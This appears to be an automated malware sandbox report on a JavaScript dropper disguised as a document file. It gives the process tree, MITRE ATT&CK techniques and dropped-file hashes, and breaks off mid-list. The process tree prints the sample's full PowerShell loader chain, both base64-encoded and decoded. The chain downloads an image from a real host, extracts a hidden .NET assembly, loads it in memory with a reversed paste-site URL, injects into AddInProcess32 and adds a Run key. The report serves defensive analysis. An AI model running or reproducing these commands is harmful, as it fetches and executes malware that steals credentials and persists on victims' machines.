    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAxADYAMAA2AC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMQAwAC8AaQB0AGUAbQBzAC8AZABlAGEAdABoAG4AbwB0AGUAXwAyADAAMgA0ADAANwAvAGQAZQBhAHQAaABuAG8AdABlAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAwAC8AMgBYAFgAbgBDAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAnADEAJwAgACwAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcACcAIAAsACAAJwBlAG4AaABhAGQAaQByACcALAAnAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgAnACwAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/2XXnC/d/ee.etsap//:sptth' , '1' , 'C:\ProgramData\' , 'enhadir','AddInProcess32','desativado'))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4496
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        
        PID:5508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1964 /prefetch:1
  2⤵
  PID:5636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2100 /prefetch:1
  2⤵
  PID:5584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
  2⤵
  PID:5860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
  2⤵
  PID:5868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
  2⤵
  PID:5892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5572 /prefetch:8
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2116 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
  2⤵
  PID:2320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
  2⤵
  PID:3136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
  2⤵
  PID:5576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5044 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4296

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1188

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:380

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5300

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\C_UsersAdministratorDesktopWernbvFILE_DOC_SSLMUNSRG0014624.js"
1⤵
- Checks computer location settings
PID:5672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAxADYAMAA2AC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMQAwAC8AaQB0AGUAbQBzAC8AZABlAGEAdABoAG4AbwB0AGUAXwAyADAAMgA0ADAANwAvAGQAZQBhAHQAaABuAG8AdABlAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAwAC8AMgBYAFgAbgBDAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAnADEAJwAgACwAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcACcAIAAsACAAJwBlAG4AaABhAGQAaQByACcALAAnAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgAnACwAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/2XXnC/d/ee.etsap//:sptth' , '1' , 'C:\ProgramData\' , 'enhadir','AddInProcess32','desativado'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5896
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:6048
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:6056
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:6064

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:880
- C:\Windows\system32\NETSTAT.EXE
  netstat
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:5168
- C:\Windows\system32\PING.EXE
  ping server
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4624

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\C_UsersAdministratorDesktopWernbvFILE_DOC_SSLMUNSRG0014624.js
1⤵
- Opens file in notepad (likely ransom note)
PID:368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ff63763eedb406987ced076e36ec9acf

SHA1
16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

SHA256
8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

SHA512
ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
41KB

MD5
58756d99d2376dcfbede6057dd25a745

SHA1
76f81b96664cd8863210bb03cc75012eaae96320

SHA256
f5d0da7b010b28a7fe2c314724a966c44068a8c8fa7e9a495e1284aa501067fa

SHA512
476e35c3da0cf223e773c2d26403c12f8c8d034273cca9e3c4cba9359f8506159c2a5267793c8bd9982b636191ddda62e9119593f5599053894c7027a58acc10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
67KB

MD5
929b1f88aa0b766609e4ca5b9770dc24

SHA1
c1f16f77e4f4aecc80dadd25ea15ed10936cc901

SHA256
965eaf004d31e79f7849b404d0b8827323f9fe75b05fe73b1226ccc4deea4074

SHA512
fe8d6b94d537ee9cae30de946886bf7893d3755c37dd1662baf1f61e04f47fa66e070210c990c4a956bde70380b7ce11c05ad39f9cbd3ea55b129bb1f573fa07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
63KB

MD5
710d7637cc7e21b62fd3efe6aba1fd27

SHA1
8645d6b137064c7b38e10c736724e17787db6cf3

SHA256
c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

SHA512
19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
1.2MB

MD5
7b60700a2555e543f061d037779e683d

SHA1
561bd2f1bc631fcfedecacbcfb0c35676a7a6336

SHA256
90ba4be6d2a6af6686dd5820f8931e5fd1edfffc898acced30dcf8f06eb13ab1

SHA512
cef7e69ff483f2ae39223c95ae6060bc4c8419366131a68740646737edb5bfb617058f8f6a4ff76dc009d6440214bb83141c3a3d5e52f6662d7225360804184e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
32KB

MD5
fe80ef21eef8af46a760efa116a2b956

SHA1
0935104a2004373b2aceedb0d6d53706f77de485

SHA256
7c68fe68bd66761f1c9b18d05455a4700e76d49354656ddde510789c42a638d1

SHA512
351bebabda323231a801aca1ce2db4f379684e09d92202ffd0f39cdbe976d34012c6306e2103f136826d8bddd99174a429017a825aaaadcbbf9765b8ef533128

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
101KB

MD5
4f596ac208c782e85d4214ed5b851165

SHA1
140904dc62102439c0492f314cbcb72c346c9bcd

SHA256
48169718083db9faf1aecada5962619416d7d5c12623d978c2a27e144971e9a2

SHA512
